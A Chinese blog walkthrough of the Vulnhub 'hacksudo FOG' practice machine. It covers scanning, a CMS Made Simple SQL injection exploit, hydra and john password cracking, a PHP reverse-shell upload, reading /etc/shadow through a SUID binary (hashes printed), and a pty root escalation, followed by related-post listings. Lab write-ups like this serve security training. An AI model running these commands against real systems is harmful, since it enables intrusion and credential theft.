hacksudo FOG

最新推荐文章于 2024-07-26 16:35:52 发布
最新推荐文章于 2024-07-26 16:35:52 发布
阅读量674 收藏 1
点赞数 1
文章标签: python web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bobo_milk/article/details/124968862
版权

目录

        一、主机发现 

        二、漏洞发现

        三、漏洞利用

        四、信息收集

        五、权限提升 

总结

一、主机发现 

nmap 192.168.216.0/24

常规的端口扫描 

nmap -A -T4 -p- 192.168.216.153

二、漏洞发现

访问80端口,在源代码处有一段提示:凯撒密码+github网站

由于我的github打不开,在搜查wp后发现是一个wav文件提取脚本 

dirsearch对该网站进行目录扫描

访问80端口cms目录下的文件,发现是一个cms。 

 

对cms目录下的文件进行扫描,查看了之后没有特别的文件

这里有爆出一个用户名:hacksudo 

 由于是cms,果断上kali查找该cms的cve,真的有一个sql注入漏洞,该cms的版本为2.2.5 < 2.2.10,可以进行利用。

searchsploit CMS Mode Simple 2.2.5

脚本的利用方式 

注意:该脚本需要修改print,不然执行会失败

python3 46635.py -u http://192.168.216.153/cms/

 

[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3

爆出了用户名邮箱和密码,果断上cms登录,但是失败了,接着上ssh进行连接,也失败了,怀疑密码是进行了加密,但是不知道是哪一种加密方式。到这里思路就没了

在网上找wp后发现还有文件没有被发现dict.txt文件,这是一个字典文件。

gobuster dir -e -u http://10.36.101.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x  .txt,.php,.html;

将字典文件保存下来作为我们的字典,想到21端口也开放了,结合上面的用户名hacksudo,因此对21端口使用此字典进行爆破 

hydra -l hacksudo -P dict.txt ftp://192.168.216.153

成功爆破出密码:hackme

登录到服务器的ftp 

 第一个flag也在这,将所有文件保存到本机

在解压文件时发现需要密码 

 

对该文件进行爆破,得到密码:fooled

zip2john secr3tSteg.zip > hash    #转换为可识别的hash
john hash dict.txt                #爆破密码得到fooled
unzip secr3tSteg.zip              #解压

之前提示的脚本在这里就有用处了,对wav文件进行提取得到:zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR ;凯撒密码解密得到:wwww.localhost/fog Username=fog:password=hacksudoISRO

有用户名和密码,登录上cms

三、漏洞利用

在该系统出找到了一个文件上传点 

 

 经过测试之后,可以上传.asp.aspx.jsp.phtml等后缀的文件

 在这里我选择了kali自带的webshell--php-reverse-shell.php,将后缀改为.phtml上传到服务器,kali监听8888端口反弹shell。

反弹shell成功,获得第二个flag。 

 四、信息收集

 

有3个用户。 

查看SUID文件,发现了一个二进制文件look。可以使用look查看/etc/shadow

/etc/shadow文件下有root和isro用户的hash值

root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/

isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/

将这两个用户的hash值保存下来,使用上面得到的字典进行解密。

最终只得到了isro用户的密码:qwerty ;但是已经足够了

登录到isro用户

五、权限提升 

查看当前用户可用于提权的命令

查询后发现ls命令并不能用来提权,查看fog下的文件 

发现了有root权限的可执行文件fog

查看该文件执行的命令后,有几个命令需要注意。 

执行了fog文件后发现是一个python,直接上提权

import pty;pty.spawn("/bin/bash")

 成功提权到root,得到最后一个flag!完结!!!

总结

目录遍历:gobuster工具;字典的选择

暴力破解密码

cms漏洞查找

文件上传漏洞的后缀名

/etc/shadow记录用户的密码hash值

使用john对hash加解密

suid提权,有root权限的二进制文件

一元二次方
关注
Hacksudofog
Demonering的博客
02-23 4085
1.信息收集 存活主机扫描 端口扫描 目录扫描 nmap -A -T4 -p- 192.168.56.0/24 发现192.168.56.101开放21,22,80,443,3306端口 访问对应80端口 暂时没发现可用东西,接着目录扫描 didirb http://192.168.56.101/ gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-mediu
HACKSUDO: FOG靶机
logan_logan的博客
05-29 1017
1.在浏览器中输入靶机地址; 2.端口扫描 发现开启了FTP服务,说不定在接下来能利用上; nmap -A -p1-65535 10.36.101.169 3.目录枚举 枚举到了一个有意思的txt文件,打开之后怀疑存在FTP登录密码; gobuster dir -e -u http://10.36.101.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html; 忘记截图了,这是用
9、hacksudo---Thor
最新发布
DamnVanish的博客
07-26 977
看到有这么多的功能点,首先是有一个添加news的地方,想着是不是可以添加webshell到这个news页面中,然后尝试了一下发现了都转义了并不可以,然后尝试是否存在SQL注入的漏洞,发现存在宽字节注入,好吧是我搞错了,这里只是他的长度太长了l类型不一致导致报错,并没有宽字节注入。然后使用sudo -u thor 用thor的身份去执行这个hammer.sh文件,要输入两个值,第一个值是任意的密码,第二个值在多次尝试后发现是执行命令的地方,于是可以直接将bash弹出,并且提升为交互式shell。
vulnhub之hacksudo FOG
qwweggfe的博客
08-05 274
1、信息搜集: 查看IP地址 查看端口并进行分析 查看是否有漏洞没有发现 打开网页 查看你源码发现在index.php的文件 caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!> 2、webshell 给我两个信息 一个是用户 一个是工具 同时对网页进行探测 在进行默认的dirb的检测 爆出好多目录,发现dict.txt文档 于是将其下载到本地 进行密码破解 进...
Vulnhub_hacksudo_fog
qq_45434762的博客
05-22 811
主机信息kali: 192.168.1.11 hacksudo_fog: 192.1.12 信息收集使用nmap扫描目标主机IP发现开放以下端口nmap -T4 -A -v -p- 19...
Unity 官方推荐插件Fog Volume 3.2.1p3
02-05
"Fog Volume 3.2.1p3"是一款由Unity官方推荐的插件,专门用于生成逼真的雾、云和大气雾效。这款插件的出现,使得开发者能够更加轻松地创建出丰富多样的气候和环境效果。 首先,让我们深入了解Fog Volume的核心特性...
Atmospheric Height Fog 1.8.1.unitypackage
12-20
由于多个深度渲染问题,雾将无法在URP 7.2.0或更高版本Android设备上使用(Unity的漏洞)!为使本工具正常运行,需要开启深度纹理和以下URP功能之一:不透明纹理、HDR、MSAA、后期处理或渲染范围设为大于或小于1。...
Volumetric Fog Mist 2 2.3.1.unitypackage
07-20
Volumetric Fog & Mist 2 is a complete redesign of Volumetric Fog & Mist, written from scratch for Universal Rendering Pipeline, with a focus on fog areas which makes it easier to use and performant.
靶机渗透练习99-hacksudoFOG
hirak0的博客
05-12 4737
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-fog,697/ Description This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b) The box was created with Virtualbox. Upon booting up use netdiscov
Vulnhub靶机:hacksudo-FOG
qq_48904485的博客
02-08 910
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-FOG(10.0.2.48)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacksudo-fog,697/
hack_fish_sudo:这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
03-26
hack_fish_sudo 这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
Vulnhub 靶机测试NO.30 hacksudo FOG
YouthBelief的博客
04-11 3257
hacksudo FOGhacksudo FOG渗透测试1 环境准备2 测试过程2.1 nmap 扫描端口2.2 测试思路2.3 浏览802.4 gobuster目录枚举2.5 查看cms目录2.6 searchsploit 搜索cms历史漏洞2.7 查看dict.txt2.8 抓包登录爆破cms后台(失败)2.9 爆破ftp2.10 获取到第一个flag2.11 ftp下载另外三个文件2.12 zip2john 破解zip密码2.13 从解压的音频文件提取密文2.14 登陆后台2.15CVE-2018-1
HacksudoAliens
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-04 450
HacksudoAliens arp-scan --interface=eth0 192.168.1.0/24 nmap -sC -sV -p- -sT 192.168.1.251 -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans sV: Probe open ports to determine service/version info -sC: equivalent to --script=default ..
hacksudo: L.P.E.
wanguixiu的博客
06-10 389
hacksudo: L.P.E. 作者: admin 时间: 2021-06-03 分类: vulnhub靶场 step1.存活主机探测,使用"fping -g 192.168.3.0/24"扫描,结果如下,1是网关,129是kali,目标主机是133step2.端口扫描,使用"nmap -A -p 1-65535 -v 192.168.3....
vulnhub之hacksudo:Thor
weixin_54431413的博客
05-24 1004
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
Vulnhub_hacksudo-search
qq_45434762的博客
05-09 1030
主机信息kali: 192.168.1.10 hacksudo-search: 192.168.1.9 信息收集通过信息收集发信目标追击开发22、80两个端口nmap -T4 -A -v ...
渗透测试hacksudo-1.0.1 SCP提权
hljzzj的博客
01-27 1041
靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-101,650/ 名称: hacksudo系列1.0.1 靶场: VulnHub.com 难度: 简单 发布时间: 2021年4月4日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -sP 19.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值